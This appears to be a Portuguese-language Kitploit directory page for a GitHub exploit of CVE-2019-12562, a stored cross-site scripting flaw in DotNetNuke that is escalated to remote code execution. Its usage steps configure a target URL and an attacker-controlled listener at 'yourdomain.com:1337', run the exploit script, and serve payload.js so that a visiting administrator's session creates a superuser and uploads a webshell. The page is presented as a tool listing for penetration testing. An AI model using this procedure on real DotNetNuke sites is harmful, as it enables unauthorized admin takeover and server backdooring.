Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-12562 — Cross-Site Scripting Armazenado no DotNetNuke (DNN) Versão anterior a 9.4.0 | XSS para RCE | Kitploit
Ferramentas/GitHubGitHub/mayaseven/cve-2019-12562
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Cross-Site Scripting Armazenado no DotNetNuke (DNN) Versão anterior a 9.4.0 | XSS para RCE

Ver Repositório
84há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-12562

CVE-2019-12562 Cross-Site Scripting Armazenado no DotNetNuke (DNN) Versão anterior a 9.4.0 permite que atacantes remotos armazenem e incorporem scripts maliciosos na página de notificação de administrador. O exploit pode ser usado para executar qualquer ação com privilégios de administrador, como gerenciar conteúdo, adicionar usuários, fazer upload de backdoors para o servidor, etc. A exploração bem-sucedida ocorre quando um administrador visita uma página de notificação com cross-site scripting armazenado.

Exploração

  • Configure o arquivo do exploit
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Executando o exploit se o alvo estiver vulnerável, o exploit registrará um usuário fictício com XSS anexado no campo "Display Name" e você obterá o payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Você precisa servir o servidor web e colocar o payload.js nele para aguardar a conexão do administrador.
root@kitploit:~
python -m SimpleHTTPServer 1337

Este exploit criará um superusuário e fará upload de uma webshell para o servidor alvo

Condição do Exploit: A exploração bem-sucedida ocorre quando um administrador visita uma página de notificação.

Leia Mais: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Referência CVE: https://www.cvedetails.com/cve/CVE-2019-12562/

Baixar ferramenta